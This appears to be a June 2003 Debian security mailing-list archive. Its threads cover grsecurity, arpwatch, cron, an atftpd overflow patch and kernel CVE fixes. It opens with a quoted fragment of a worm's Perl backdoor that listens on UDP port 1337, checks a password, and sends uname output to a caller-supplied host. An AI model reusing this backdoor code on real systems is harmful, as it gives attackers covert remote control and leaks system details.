> $csock = IO::Socket::INET->new(Proto => 'udp',
> LocalPort => 1337, ReuseAddr => 1) or
> exit;while($string =<$csock>)
> {
> chop($string);
> my ($pw, $cmd, $arg1, $arg2) = split "
> ", $string;next unless($cmd);
> next unless($arg1);
> next unless(crypt($pw, $pass) eq $pass);
> if ($cmd eq "ping") {
> my $bsock =
> IO::Socket::INET->new(Proto =>
> 'udp', PeerAddr => $arg1,
> PeerPort => $arg2,
> ReuseAddr => 1) or
> next;
> print $bsock"pong
> ".`uname -mnrs`; close $bsock;
>
2.5 and grsec [was Re: a weird script worm uploaded via php with debian 3.0 ?]
On Wed, Jun 11, 2003 at 03:24:11PM +0200, DEFFONTAINES Vincent wrote: > I use it and am very happy with it. If I trust archives from this list, I am > not > the only one in this case :-) Is anyone using it with 2.5? I'm on the cusp of switching a few machines to it to get up the learning curve before 2.6 comes to pass. I would not think a 2.4 patchset would have much chance of working against it... -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
arpwatch exclusion ?
Hello all. I am using arpwatch, but I use a few machines with 2 ethernet cards, and they often flip-flop... As I know them, I want to exclude the flip-flop mails from my mailbox... How could I tune arpwatch so that it does not listen to those flip-flops, or it does not send mails for these ? Thank you ! -- Jacques Foury -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: arpwatch exclusion ?
On Wed, 11 Jun 2003, Jacques Foury wrote: > Date: Wed, 11 Jun 2003 17:50:14 +0200 > From: Jacques Foury <[EMAIL PROTECTED]> > To: [EMAIL PROTECTED] > Subject: arpwatch exclusion ? > Resent-Date: Wed, 11 Jun 2003 11:10:48 -0500 (CDT) > Resent-From: [EMAIL PROTECTED] > > Hello all. > > I am using arpwatch, but I use a few machines with 2 ethernet cards, and > they often flip-flop... As I know them, I want to exclude the flip-flop > mails from my mailbox... > > How could I tune arpwatch so that it does not listen to those > flip-flops, or it does not send mails for these ? Well you will have almost the same mail content/header sending from arpwatch. So why not use your mail-filter to filter out this kind of mail? No need to fix arpwatch, it suppose to work that way. cj > > Thank you ! > > -- > Jacques Foury > > > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: apache
Martynas Domarkas wrote: Yes, of course. But in this case I will invoke rotatelogs... I don't like it. Martynas: three people now have given you advice on how to fix your "problem" three different ways. Apache doesn't have this behaviour: in fact, the apache foundation suggests you use cronolog: http://httpd.apache.org/docs/logs.html#piped If you dont' like this behaviour, take it up on the apache lists, although it's been discussed before. glen -- Glen Mehn [EMAIL PROTECTED] "if you ever swallow the universe, remember to spit the dragon back out.xx.--swan -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: kernel-source 2.4.20 + grsecurity + freeswan
Le jeu, Jun 05, 2003 a 21:50:33 -0400, Hubert Chan a écrit: > > "Vinai" == Vinai Kopp <[EMAIL PROTECTED]> writes: > > [...] > > Vinai> There seem to be problems using both the grsecurity and the > Vinai> freeswan patches (at least I haven't been successfull applying > Vinai> the patches - I tried the debian versions and the "official" ones > Vinai> from the different project sites of the patches and the kernel > Vinai> sources). > > I have a Debian/sid machine running a 2.4.20 kernel with both patches > applied (along with a whole bunch of other patches), and had no problems > applying the patches. The patches and kernel sources I got from the sid > repository maybe about a month ago. I would imagine that there > shouldn't be much of an issue using the patches and kernel sources from > sid on a stable box. do you happen to have XFS patched onto that kernel? :) and what was the order of the patching? eric (infrequent poster) > -- > Hubert Chan <[EMAIL PROTECTED]> - http://www.uhoreg.ca/ > PGP/GnuPG key: 1024D/124B61FA > Fingerprint: 96C5 012F 5F74 A5F7 1FF7 5291 AF29 C719 124B 61FA > Key available at wwwkeys.pgp.net. Encrypted e-mail preferred. -- UNIX is user friendly, it's just picky about who its friends are. --- ,''`. http://www.debian.org/ | http://www.nuit.ca/ : :' : Debian GNU/Linux| http://simonraven.nuit.ca/ `. `' | PGP key ID: 6169 BE0C 0891 A038 `- | -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: arpwatch exclusion ?
In article <[EMAIL PROTECTED]> [EMAIL PROTECTED] writes: >I am using arpwatch, but I use a few machines with 2 ethernet cards, and >they often flip-flop... As I know them, I want to exclude the flip-flop >mails from my mailbox... > >How could I tune arpwatch so that it does not listen to those >flip-flops, or it does not send mails for these ? Use the "-s program" option to send the "mail" via a program that does whatever filtering you want. I'm filtering out the proxy-arp responces this way. (There are hundreds of them every day on my firewall.) Unless you know all flip-flops will be noise, I'd recomend only filtering the ones you know about. -- Blars Blarson [EMAIL PROTECTED] http://www.blars.org/blars.html "Text is a way we cheat time." -- Patrick Nielsen Hayden -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
atftpd vulnerability and patch?
http://packetstorm.linuxsecurity.com/filedesc/atftpdx.c.html says: Proof
of concept remote root exploit for atftpd version 0.6. Makes use of the
filename overflow found by Rick Patel. Related post here. Tested against
Debian 3.0. By gunzip
http://packetstorm.linuxsecurity.com/filedesc/atftpd.patch.html says:
Simple patch to fix the overflow found in atftpd by Rick Patel. By gunzip
The patch is:
--- tftpd_file.cTue Mar 12 05:26:18 2002
+++ tftpd_file_diff.c Thu Jun 5 20:31:06 2003
@@ -357,7 +357,8 @@
else
{
strcpy(filename, directory);
- strncat(filename, data->tftp_options[OPT_FILENAME].value, VAL_SIZE);
+ strncat(filename, data->tftp_options[OPT_FILENAME].value,
+ VAL_SIZE - strlen( directory ) - 1 );
}
/* If the filename contain /../ sequences, we forbid the access */
http://packages.qa.debian.org/a/atftp.html shows:
[2002-04-24] Accepted atftp 0.6.1.1 (source hppa)
[2002-04-13] Accepted atftp 0.6.1 (i386 source)
[2002-03-31] Accepted atftp 0.6 (i386 source)
[2002-02-11] Installed atftp 0.5 (i386 source)
[2001-07-21] Installed atftp 0.4 (i386 source)
[2001-03-05] Installed atftp 0.3 (i386 source)
[2000-12-27] Installed atftp 0.2 (i386 source)
[2000-08-21] Installed atftp 0.1 (source i386)
and:
Testing 0.6.1.1
Stable 0.6
I'm guessing atftp is vulnerable, but without checking I won't file a bug.
Checking the code should be easy, but checking if this could actualy be
exploited would take a bit more thought. If stable is actualy vulnerable
and exploitable then the security team should be co-ordinated with.
Drew Daniels
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
grsecurity vs lsm vs lids
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 OK, I have been seeing lots of people on this list recommend using the grsecurity kernel patch. Now I want to give it a go, but I see that there is also a lsm patch and I also remember lids being recommended in the past by others. I would like to learn the interface to what is going to become the standard in future kernels. I read something while googling that suggested that lsm seems to be the way that the kernel is heading. What do people on this list recommend? Regards. Mark. -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.1 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQE+57clL/zYpWVgapgRAhvoAKCjWWfzCxbep+JNTjJHQaj8zhKL3ACffk8U n3GzkQ/8/xFevGntrlpfpFc= =D0BX -END PGP SIGNATURE- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Kernel Security Fixes
Hi, just got an announcement from the mandrake security list. Could please someone of the people with a deeper knowledge explain, if the mentioned issues are addressed in one of the "stock" debian kernels or if I have to get the sources from kernel.org and patch it myself? Mandrake Linux Security Update Advisory Multiple vulnerabilities were discovered and fixed in the Linux kernel. * CAN-2003-0001: Multiple ethernet network card drivers do not pad frames with null bytes which allows remote attackers to obtain information from previous packets or kernel memory by using special malformed packets. * CAN-2003-0244: The route cache implementation in the 2.4 kernel and the Netfilter IP conntrack module allows remote attackers to cause a Denial of Service (DoS) via CPU consumption due to packets with forged source addresses that cause a large number of hash table collisions related to the PREROUTING chain. * CAN-2003-0246: The ioperm implementation in 2.4.20 and earlier kernels does not properly restrict privileges, which allows local users to gain read or write access to certain I/O ports. * CAN-2003-0247: A vulnerability in the TTY layer of the 2.4 kernel allows attackers to cause a kernel oops resulting in a DoS. * CAN-2003-0248: The mxcsr code in the 2.4 kernel allows attackers to modify CPU state registers via a malformed address. Thank you very uch for your attention! Have a nice thread, Peter -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Kernel Security Fixes
On Thu, Jun 12, 2003 at 01:18:59AM +0200, Peter Holm wrote: > Could please someone of the people with a deeper knowledge explain, if > the mentioned issues are addressed in one of the "stock" debian > kernels or if I have to get the sources from kernel.org and patch it > myself? See DSA 311-1 at http://www.debian.org/security/2003/dsa-311 -- ___ | Web: http://web.morgul.net/~frodo/ | PGP Public Key: http://web.morgul.net/~frodo/mail.html pgp0.pgp Description: PGP signature
Re: cronjob stuck
Have you tried checking the root crontab? not a normal place to put stuff, but worth checking out anyway... Regards, William On Tue, 10 Jun 2003, Dale Amon wrote: > Just ran across an interesting prob, wondered if > anyone else has seen it. I added a repeating entry > to /etc/cron.d/foo that ran every */5 minutes. I > then tried to get rid of it... It will not die. > > I moved the file out of /etc/cron.d and it still > is running. > > I cp'd the file and deleted the old one in case > cron remembered the inode (rather a long shot). > No change. > > I did /etc/init.d/cron stop; /etc/init.d/cron start; > still it repeats. > > I did updatedb and locate cron; can't find it cached > anywhere. > > cron doesn't seem to have any flush options and no > indication that it should be caching across executions. > > I could certainly (I hope!) get rid of it by rebooting > but I can't do that with this system at this time. > > Has anyone else had trouble making vixie cron STFU? Am > I hallucinating? Is my brain in need of Coke and M&M's? > > -- > -- >IN MY NAME:Dale Amon, CEO/MD > No Mushroom clouds over Islandone Society > London and New York. www.islandone.org > -- > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: cronjob stuck
On Thu, Jun 12, 2003 at 11:55:00AM +1000, William Law wrote: > Have you tried checking the root crontab? not a normal place to put stuff, > but worth checking out anyway... Yeah, I'd checked everything. Just didn't account for pure blind bad luck chance :-) (you probably read my second post by now) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Kernel Security Fixes
On Thu, Jun 12, 2003 at 01:18:59AM +0200, Peter Holm wrote: > Hi, > > just got an announcement from the mandrake security list. > > Could please someone of the people with a deeper knowledge explain, if > the mentioned issues are addressed in one of the "stock" debian > kernels or if I have to get the sources from kernel.org and patch it > myself? That's easy. You just need to browse http://www.debian.org/security/crossreferences and search the CVE names (the stuff that says CAN-- or CVE--) against published advisories. Se below. > > > > Mandrake Linux Security Update Advisory > > Multiple vulnerabilities were discovered and fixed in the Linux > kernel. > > * CAN-2003-0001: Multiple ethernet network card drivers do not pad (..) Fixed in DSA 311. > > * CAN-2003-0244: The route cache implementation in the 2.4 kernel and Ditto. > * CAN-2003-0246: The ioperm implementation in 2.4.20 and earlier Same. > * CAN-2003-0247: A vulnerability in the TTY layer of the 2.4 kernel Ditto. > > * CAN-2003-0248: The mxcsr code in the 2.4 kernel allows attackers to Ditto. See http://www.debian.org/security/2003/dsa-311 (for i386): Security database references: In Mitre's CVE dictionary: CVE-2002-0429, CAN-2003-0001, CAN-2003-0127, CAN-2003-0244, CAN-2003-0246, CAN-2003-0247, CAN-2003-0248, CAN-2003-0364. Regards Javi pgp0.pgp Description: PGP signature
